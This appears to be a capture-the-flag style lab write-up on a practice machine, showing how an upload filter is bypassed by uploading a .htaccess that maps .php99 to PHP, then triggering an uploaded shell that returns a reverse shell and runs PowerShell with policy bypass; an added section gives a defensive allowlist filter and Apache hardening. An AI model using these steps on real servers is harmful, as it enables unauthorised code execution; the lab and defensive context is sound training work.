Uploading .htaccess
While the PHP web application on target ports 80 and 443 supports file upload, the presence of an extension filter made it rather challenging to upload a valid PHP file to get code execution. However, it was discovered that the file upload functionality accepts a .htaccess file, which can be leveraged for RCE.
The .htaccess file is a per-directory configuration file honoured by Apache web servers to control directory-level settings, including security rules. From a security perspective, it can restrict access by IP, enforce HTTPS, set password protection, and configure handler behaviour such as which file extensions are processed as PHP, among many other things.
Exploit
There could be an infinite number of exploits available, as it largely depends on context.
Looking further into it online reveals an article that showcases bypassing the extension filter by overwriting the existing .htaccess file.
It uses the AddType directive to have the .php16 extension handled as a PHP file.
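The reason this works is that an extension filter built as a blocklist of known PHP extensions has nothing to say about a dotfile with no real "extension" (.htaccess) or about an extension it has never heard of (.php99). The following is an added example, not code from the write-up or from the target application: it places a blocklist filter of that kind beside an allowlist filter that rejects dotfiles, double extensions and anything outside a fixed set. The allowed set (images only) and all filenames are constructed assumptions for illustration.

```python
"""Added example (not from the write-up): why a blocklist extension filter lets
.htaccess and shell.php99 through, and an allowlist check that does not.
All filenames below are constructed test inputs."""
import posixpath

# Assumed: the upload endpoint is meant to accept images only.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Blocklist of the kind implied by the write-up: it rejects .php but has no
# entry for unknown extensions such as .php99, and none for dotfiles.
BLOCKED_EXTENSIONS = {"php", "phtml", "php3", "php4", "php5", "phar"}


def naive_filter_allows(filename: str) -> bool:
    """Blocklist check: reject only when the last extension is a known PHP one."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLOCKED_EXTENSIONS


def hardened_filter_allows(filename: str) -> bool:
    """Allowlist check on the basename: no dotfiles, exactly one extension,
    and that extension must be in ALLOWED_EXTENSIONS."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        return False            # .htaccess, .user.ini and any other dotfile
    parts = name.split(".")
    if len(parts) != 2:         # no extension, or double extensions like x.php.png
        return False
    stem, ext = parts
    return bool(stem) and ext.lower() in ALLOWED_EXTENSIONS


def classify(filenames):
    """Return {filename: (blocklist_result, allowlist_result)} for a batch of uploads."""
    return {f: (naive_filter_allows(f), hardened_filter_allows(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample uploads, including the two names used in the write-up.
    samples = [".htaccess", "shell.php99", "shell.php", "photo.png", "shell.php.png"]
    for name, (naive, hardened) in classify(samples).items():
        print(f"{name:15} blocklist={'allow' if naive else 'reject':6} "
              f"allowlist={'allow' if hardened else 'reject'}")
```

Running it shows .htaccess and shell.php99 passing the blocklist and failing the allowlist. On the server side the same bug is closed independently of the filter: `AllowOverride None` for the uploads directory makes Apache ignore any .htaccess placed there, and turning the PHP engine off for that directory (for mod_php, `php_admin_flag engine Off` inside its `<Directory>` block) means a file that slips through is served as static content rather than executed.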
Exploitation
I will create a .htaccess file that treats .php99 as a valid PHP extension:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ cat .htaccess
AddType application/x-httpd-php .php99
Uploading the generated .htaccess file.
Now I will upload the payload.
Notice the extension is set to .php99.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ curl -s http://server.access.offsec/uploads/shell.php99

Invoking…
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.171] from (UNKNOWN) [192.168.224.187] 49911
SOCKET: Shell has connected! PID: 2640
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\uploads> powershell -ep bypasas -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\uploads> whoami
access\svc_apache
PS C:\xampp\htdocs\uploads> hostname
SERVER
PS C:\xampp\htdocs\uploads> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.224.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.224.254

Initial foothold established on the target system as the svc_apache account by uploading a .htaccess file.